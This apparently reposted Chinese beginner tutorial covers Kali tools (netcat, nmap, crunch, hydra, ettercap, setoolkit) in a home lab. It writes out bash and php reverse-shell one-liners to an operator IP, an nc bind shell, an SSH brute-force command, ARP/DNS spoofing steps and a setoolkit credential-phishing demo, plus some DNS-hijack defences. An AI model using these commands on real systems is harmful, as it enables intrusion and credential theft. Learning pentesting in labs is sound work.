首页 > 其他分享 >基础篇——Kali渗透工具初见

基础篇——Kali渗透工具初见

时间:2024-06-16 22:36:24浏览次数:13  
标签:shell 渗透 Kali nc 6666 192.168 操作机 初见 dns

基础篇——Kali渗透工具初见

1. nc(netcat/ncat)

nc常用于监听端口:

nc -lvp 6666 //监听6666端口,列出详细信息

也可以用于连接端口:

nc 192.168.118.128 6666 //尝试连接192.168.118.128的6666端口

在渗透测试中,nc通常用于监听端口以获得正向shell或反弹shell。

(1) 正向shell

目标机(192.168.118.128)监听端口:

nc -lvp 6666 -e /bin/bash //-e filename  program to exec after connect

操作机(192.168.118.130)尝试连接:

nc 192.168.118.128 6666

由于正向shell需要穿透防火墙,因此反弹shell更为常见。

(2) 反弹shell——bash

目标机尝试连接,并将shell的标准输入、标准输出和标准错误重定向至操作机:

bash -i >& /dev/tcp/192.168.118.130/6666 0>&1

bash -i 0>/dev/tcp/192.168.118.130/6666 1>&0 2>&0 //易懂的写法

操作机监听端口:

nc -lvp 6666

(3) 反弹shell——php

和bash类似,但需要依赖php执行环境。

目标机:

php -r '$sock=fsockopen("192.168.118.130",6666);exec("/bin/bash -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("192.168.118.130",6666);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

操作机:

nc -lvp 6666

2. nmap

主机扫描:

nmap -T4 -sn 192.168.118.0/24

注意被扫描的主机需要关闭防火墙,虽然据说nmap -T4 -Pn 192.168.118.0/24可以扫描,但是实操过程中发现并不靠谱。

端口扫描:

nmap -T4 -sV 192.168.118.131

-sV用于扫描端口及其对应的服务与版本。

操作系统扫描:

nmap -T4 -O 192.168.118.131

-O用于扫描操作系统及其版本。

3. crunch

crunch用于生成密码字典,主要用来和hydra配合使用。

指定字符集:

crunch 4 4 abc > dict1.txt

使用crunch内置字符集:

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space > dict2.txt

指定输出格式:

crunch 8 8 -t admin%%% > dict3.txt //%表示数字 @表示小写字母 ,表示大写字母 ^表示特殊字符

4. hydra(xhydra)

hydra用于密码爆破。

hydra -l admin -P dict3.txt ssh://192.168.118.128:22

5. ettercap

ettercap主要用于arp欺骗,进而进行dns劫持。

(1) arp欺骗(arp poisoning)

arp协议用于将IP地址映射为MAC地址;arp欺骗就是通过向目标机发送arp应答,使其误以为操作机就是arp请求的对象,进而进行嗅探攻击、中间人攻击以及拒绝服务攻击。

(2) dns劫持(dns spoofing)

dns协议用于将域名映射为IP地址或将IP地址映射为域名;dns劫持属于中间人攻击的一种,用于将目标机想要访问的域名解析为指定的IP地址,进而进行网络钓鱼等攻击。

配置/etc/ettercap/etter.dns文件,使目标机对所有域名的查询请求都解析为操作机的IP地址。(需要配置反向查询,原因我也不清楚)

编写测试网页index.html,然后开启Apache2。

使用ettercap -G命令开启ettercap的图形化界面,Scan for hosts,Host list。

将网关加入Target1,将目标机加入Target2,ARP poisoning,DNS spoofing。

Start sniffing,然后在192.168.118.131(Windows)打开edge浏览器,清空缓存,使用http协议访问www.baidu.com(Apache2为http服务器的中间件,因此不能使用https协议访问),显示页面如下,dns劫持成功!

再在192.168.118.128(Linux)打开firefox浏览器,使用同样的方式访问www.baidu.com,显示请求失败,原因是firefox内置Https-Only安全策略,无法使用http协议访问网站。因此可以通过wget的方式拉取页面,进行验证。

(3) dns劫持防御策略

a. 开启防火墙,防止被ettercap使用Scan for hosts扫描。

b. 配置静态ARP,防止被ettercap使用ARP poisoning进行欺骗。

c. 使用内置Https-Only安全策略的浏览器,防止dns劫持。

6. setoolkit

setoolkit全称是social engineer toolkit,即社会工程学工具,是一款非常强大的工具。

下面使用其中的网站钓鱼模块以做演示。

先在网上随便找一个需要输入用户名和密码的登录页面,复制其url。(正规登录网页一般都有重定向的防御策略,尽量不要选择)

然后目标机访问192.168.118.130,输入用户名和密码;回到操作机,成功获取信息!

image-20240616222039506

标签:shell,渗透,Kali,nc,6666,192.168,操作机,初见,dns
From: https://www.cnblogs.com/yaoguyuan/p/18251399

相关文章

  • Amass一键检测目标的信息(KALI工具系列二十六)
    目录1、KALILINUX简介2、Amass工具简介3、信息收集3.1目标主机IP(服务器)3.2KALI的IP 4、操作示例4.1域名枚举4.2更换数据源4.3自定义数据源 4.4输出结果4.5枚举多个域名5、总结1、KALILINUX简介KaliLinux是一个功能强大、多才多艺的Linux发......
  • 域渗透之初识LM&NTLM认证过程
    目录前言LMHashNTLMHashWindows本地认证LSASS进程Mimikatz抓取明文密码Windows网络认证NetNTLMNTLMv1&NTLMv2Hash传递攻击前言LANManager和NTLANManager认证是Windows系统中的一种挑战-响应身份验证机制。LM认证是早期Windows版本中使用的一种认证协议,而NTLM是LM的改......
  • 全面的初级入门指南,从安装到基本使用,再到一些高级功能的介绍,帮助用户在实际操作中逐步
    大纲:WindowsNmap初级使用教程1.简介什么是Nmap?Nmap的主要功能和用途安全和法律注意事项2.安装Nmap前提条件从官方网站下载Nmap安装步骤验证安装3.基本使用打开命令提示符运行你的第一个Nmap扫描示例命令:nmap目标IP地址理解基本的输出结果4.常用扫......
  • 浅谈域攻防渗透之道-敏感文件获取
    搜集敏感密码配置⽂件dir命令搜集敏感密码配置⽂件⼀般配置⽂件或者密码⽂件都是:*,pass.*,config.*,username.*,password.*pwd查看当前工作目录使⽤dir命令来进⾏⽂件查找通过type命令进行查看for循环搜集敏感密码配置⽂件通过for循环来查找匹配pass⽂......
  • 基础篇——VMware与提权初见
    基础篇——VMware&提权初见1.VMware基础(1)下载并安装VMwareWorkstationPro,下载CentOS7_64的iso镜像文件并安装。(不会就在网上搜索相关教程)(2)VMware中的虚拟机有3种连网方式:仅主机(Host-Only)、桥接(Bridged)、网络地址转换(NAT)。仅主机模式不能访问公网,因此没啥大用......
  • 基于Python+scopy实现的渗透测试工具对网站URL以及端口进行漏洞检测系统
    目录摘要2Abstract3第1章绪论51.1研究背景与意义51.2国内外研究现状和发展趋势51.3本论文主要工作及组织结构61.3.1论文主要研究工作61.3.2论文的组织结构6第2章web安全评估及测试的介绍82.1渗透测试82.2web安全评估8第3章渗透测试及安......
  • MSF渗透使用说明
    实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali......
  • kali
    1.下载kali下载地址:GetKali|KaliLinux我们直接下载已经搭建好的kali虚拟机​​根据你的需求选择版本下载,一般都是选择64位的,点击VMware​​直接开始下载,如果下载速度慢,请自行挂代理加速下载!2.安装Kali下载完成之后是一个压缩包文件,请将其解压在无中文......
  • kali中安装zsteg教程
    1、下载文件gitclonehttp://www.github.com/zed-0xff/zsteg 2、第一步需要保证虚拟机是有网络的,不然无法克隆3、可以将网络设置成如下后重启,访问百度看看能不能访问,若可以访问,则进行下一步4、查看源,删除源,添加新源gemsources-lgemsources--removehttps://rub......
  • 干货分享!渗透测试成功的8个关键
     01知道为什么要测试执行渗透测试的目的是什么?是满足审计要求?是你需要知道某个新应用在现实世界中表现如何?你最近换了安全基础设施中某个重要组件而需要知道它是否有效?或者渗透测试根本就是作为你定期检查防御健康的一项例行公事?当你清楚做测试的原因时,你也就知晓自己想......